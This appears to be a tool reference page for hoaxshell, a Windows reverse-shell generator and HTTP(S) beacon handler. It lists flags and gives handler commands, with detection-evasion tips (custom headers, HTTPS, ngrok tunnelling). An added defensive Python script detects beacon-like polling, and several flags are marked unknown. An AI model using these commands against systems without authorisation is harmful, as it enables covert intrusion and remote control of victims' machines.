Tags: Exploitation, reverse-shell, windows, http, https, payload, beacon

Hoaxshell

Hoaxshell is a Windows reverse shell payload generator and handler that abuses the HTTP(S) protocol to establish a beacon-like reverse shell. It generates payloads and handles sessions over standard web protocols.

Description

Hoaxshell provides a method to generate and manage Windows reverse shells by leveraging HTTP(S) for communication, mimicking legitimate web traffic to evade detection. It is particularly useful in penetration testing scenarios where traditional shell protocols might be blocked or monitored.

The tool supports both HTTP and HTTPS modes, with options for custom headers, encrypted sessions, and integration with reverse proxies. This makes it suitable for establishing persistent, low-detection reverse shells on target Windows systems.

Key use cases include generating undetectable payloads for initial access, maintaining command and control (C2) over HTTP(S), and handling shell interactions through a Python-based interface.

How It Works

Hoaxshell operates by generating a Windows payload that establishes a reverse connection to the handler over HTTP(S). The shell session data is transferred via HTTP headers (with customizable names to evade regex-based AV detection). It functions in a beacon-like manner, polling the server at specified frequencies. HTTPS support uses provided certificates for encryption, and options like reverse proxy tunneling (-lt, -ng) enable integration with tools for additional obfuscation.
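
For defenders, the beacon-like polling described above is a more durable signal than header names, which the operator can change. The following is an added example (not from the original page or the hoaxshell project) that flags client/destination pairs with near-constant request intervals in a constructed proxy log; the log format, field order and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log (not real traffic): timestamp, client, destination, method, path.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.23 203.0.113.50:8080 GET /x
2024-05-01T10:00:01 10.0.0.40 intranet.example.com GET /
2024-05-01T10:00:02 10.0.0.40 intranet.example.com GET /app.js
2024-05-01T10:00:03 10.0.0.40 intranet.example.com GET /logo.png
2024-05-01T10:00:05 10.0.0.23 203.0.113.50:8080 GET /x
2024-05-01T10:00:10 10.0.0.23 203.0.113.50:8080 GET /x
2024-05-01T10:00:16 10.0.0.23 203.0.113.50:8080 GET /x
2024-05-01T10:00:20 10.0.0.23 203.0.113.50:8080 GET /x
2024-05-01T10:00:25 10.0.0.23 203.0.113.50:8080 GET /x
2024-05-01T10:00:30 10.0.0.23 203.0.113.50:8080 GET /x
2024-05-01T10:00:45 10.0.0.40 intranet.example.com GET /news
2024-05-01T10:02:10 10.0.0.40 intranet.example.com GET /wiki
2024-05-01T10:02:11 10.0.0.40 intranet.example.com GET /wiki.css
2024-05-01T10:05:30 10.0.0.40 intranet.example.com GET /mail
"""

def beacon_candidates(log, min_requests=6, max_cv=0.2):
    """Map (client, dest) -> (mean gap in s, coefficient of variation) for regular pollers."""
    flows = defaultdict(list)
    for line in log.strip().splitlines():
        ts, client, dest, _method, _path = line.split()
        flows[(client, dest)].append(datetime.fromisoformat(ts))
    hits = {}
    for key, times in flows.items():
        if len(times) < min_requests:
            continue  # too few requests to judge periodicity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Low spread relative to the mean gap = machine-like polling, not browsing.
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            hits[key] = (round(avg, 2), round(pstdev(gaps) / avg, 3))
    return hits

if __name__ == "__main__":
    for (client, dest), (gap, cv) in beacon_candidates(SAMPLE_LOG).items():
        print(f"{client} -> {dest}: every ~{gap}s (cv={cv})")
```

The thresholds (`min_requests`, `max_cv`) are starting points to tune against a baseline of known periodic clients such as update checkers and monitoring agents.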

Installation

sudo apt install hoaxshell

Flags

-s, --server-ip SERVER_IP: Your hoaxshell server IP address or domain.
-c, --certfile CERTFILE: Path to your SSL certificate.
-k, --keyfile KEYFILE: Path to the private key for your certificate.
-p, --port PORT: Your hoaxshell server port (default: 8080 over HTTP, 443 over HTTPS).
-f, --frequency FREQUENCY: Beacon frequency.
-i: Interactive mode.
-H, --header HEADER: Custom HTTP header name.
-x, --exec-outfile EXEC_OUTFILE: Output file for generated payload.
-r: Unknown from help.
-o: Unknown from help.
-v, --server-version SERVER_VERSION: Server version.
-g: Unknown from help.
-t: HTTPS mode.
-cm: Unknown from help.
-lt: Reverse proxy tunneling (e.g., with lt).
-ng: Reverse proxy tunneling (e.g., with ngrok).
-u: Unknown from help.
-q: Quiet mode.

Examples

Basic shell session over HTTP:
hoaxshell -s <your_ip>

Recommended usage to avoid detection over HTTP, using a custom header:
hoaxshell -s <your_ip> -i -H "Authorization"

Usage with custom header and exec outfile over HTTP:
hoaxshell -s <your_ip> -i -H "Authorization" -x "C:\Users\$env:USERNAME\.local\hack.ps1"

Encrypted shell session over HTTPS with a trusted certificate:
hoaxshell -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

Encrypted shell session over HTTPS with a self-signed certificate (after generating certs with openssl):
hoaxshell -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

Encrypted shell session with reverse proxy tunneling tools (e.g., lt):
hoaxshell -lt

Encrypted shell session with reverse proxy tunneling tools (e.g., ngrok):
hoaxshell -ng

Show help message and usage options:
hoaxshell -h

Updated 2026-04-16 (source: kali.org)